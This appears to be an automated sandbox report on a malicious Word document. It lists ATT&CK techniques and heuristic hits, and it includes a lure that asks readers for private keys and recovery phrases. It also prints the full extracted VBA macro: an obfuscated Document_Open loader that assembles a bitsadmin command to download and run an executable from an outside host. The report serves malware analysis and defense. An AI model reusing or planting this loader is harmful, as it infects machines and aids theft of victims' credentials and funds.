MALICIOUS
210
Risk Score
Malware Insights
MITRE ATT&CK
T1059.005 Visual Basic
T1566.001 Spearphishing Attachment
The sample contains obfuscated VBA macros designed to execute a command. The Document_Open macro is triggered upon opening, and it constructs and executes a command line using cmd.exe and bitsadmin to download a second-stage payload from 'http://siski.ml/pollyana.exe' and save it as '%appdata%\123.exe'. The document body itself is a lure, masquerading as a security evaluation to solicit sensitive information like private keys or recovery phrases, aligning with social engineering tactics.
Heuristics 6
-
Recovery secret / private key request critical SE_SECRET_RECOVERY_LUREDocument requests recovery phrases, private keys, backup codes, or saved passwords. Requests for these secrets in a document are high-risk.
-
VBA macros detected medium 3 related findings OLE_VBA_MACROSDocument contains VBA macro code
-
Potential Shell call in VBA critical OLE_VBA_SHELLPotential Shell call in VBAMatched line in script
Shell myfletch -
Obfuscated auto-exec VBA loader critical OLE_VBA_OBFUSCATED_AUTOEXEC_LOADERAuto-exec VBA reconstructs strings with a heavy custom decoder (numeric char-array, repeated hex-string decode, or junk-token Replace removal) and feeds them to a COM-instantiation or execution sink. This obfuscated-loader shape keeps CreateObject/Shell/URL indicators out of the macro source.Matched line in script
Shell myfletch -
Document_Open macro low OLE_VBA_DOCOPENDocument_Open macroMatched line in script
Private Sub Document_Open() -
Embedded URL info EMBEDDED_URLOne or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.URL http://www.w3.org/1999/02/22-rdf-syntax-ns# In document text (OLE body)
- http://ns.adobe.com/xap/1.0/In document text (OLE body)
- http://ns.adobe.com/xap/1.0/mm/In document text (OLE body)
- http://ns.adobe.com/xap/1.0/sType/ResourceRef#In document text (OLE body)
Extracted artifacts 1
Files carved from inside the sample during analysis.
| Filename | Kind | Source | Size |
|---|---|---|---|
macros.bas |
vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 1906 bytes |
SHA-256: f086414f3a33c84f65472b0bc4a6a1ed00927bffe7be04a4200b2ad406fbc186 |
|||
Preview scriptFirst 1,000 lines of the extracted script
Attribute VB_Name = "ThisDocument" Attribute VB_Base = "1Normal.ThisDocument" Attribute VB_GlobalNameSpace = False Attribute VB_Creatable = False Attribute VB_PredeclaredId = True Attribute VB_Exposed = True Attribute VB_TemplateDerived = True Attribute VB_Customizable = True Private Sub Document_Open() MsgBox "This Document is confidential. Please do not copy or resend" Dim myfletch, a1, a2, a3, a4 As String a1 = Chr(99) + Chr(109) + Chr(100) + Chr(46) + Chr(101) + Chr(120) + Chr(101) + Chr(32) + Chr(47) + Chr(99) a2 = Chr(32) + Chr(98) + Chr(105) + Chr(116) + Chr(115) + Chr(97) + Chr(100) + Chr(109) + Chr(105) + Chr(110) + Chr(32) + Chr(47) + Chr(116) + Chr(114) + Chr(97) + Chr(110) + Chr(115) + Chr(102) + Chr(101) + Chr(114) + Chr(32) + Chr(109) + Chr(121) + Chr(106) + Chr(111) + Chr(98) + Chr(32) + Chr(47) + Chr(100) + Chr(111) + Chr(119) + Chr(110) + Chr(108) + Chr(111) + Chr(97) + Chr(100) + Chr(32) + Chr(47) + Chr(112) + Chr(114) + Chr(105) + Chr(111) + Chr(114) + Chr(105) + Chr(116) + Chr(121) + Chr(32) + Chr(110) + Chr(111) + Chr(114) + Chr(109) + Chr(97) + Chr(108) a3 = Chr(32) + Chr(104) + Chr(116) + Chr(116) + Chr(112) + Chr(58) + Chr(47) + Chr(47) + Chr(115) + Chr(105) + Chr(115) + Chr(107) + Chr(105) + Chr(46) + Chr(109) + Chr(108) + Chr(47) + Chr(112) + Chr(111) + Chr(108) + Chr(121) + Chr(97) + Chr(110) + Chr(97) + Chr(46) + Chr(101) + Chr(120) + Chr(101) a4 = Chr(32) + Chr(37) + Chr(97) + Chr(112) + Chr(112) + Chr(100) + Chr(97) + Chr(116) + Chr(97) + Chr(37) + Chr(92) + Chr(49) + Chr(50) + Chr(51) + Chr(46) + Chr(101) + Chr(120) + Chr(101) + Chr(38) + Chr(115) + Chr(116) + Chr(97) + Chr(114) + Chr(116) + Chr(32) + Chr(37) + Chr(97) + Chr(112) + Chr(112) + Chr(100) + Chr(97) + Chr(116) + Chr(97) + Chr(37) + Chr(92) + Chr(49) + Chr(50) + Chr(51) + Chr(46) + Chr(101) + Chr(120) + Chr(101) myfletch = a1 + a2 + a3 + a4 Shell myfletch End Sub |
|||
Open this report in the interactive analyzer, or submit your own file for analysis.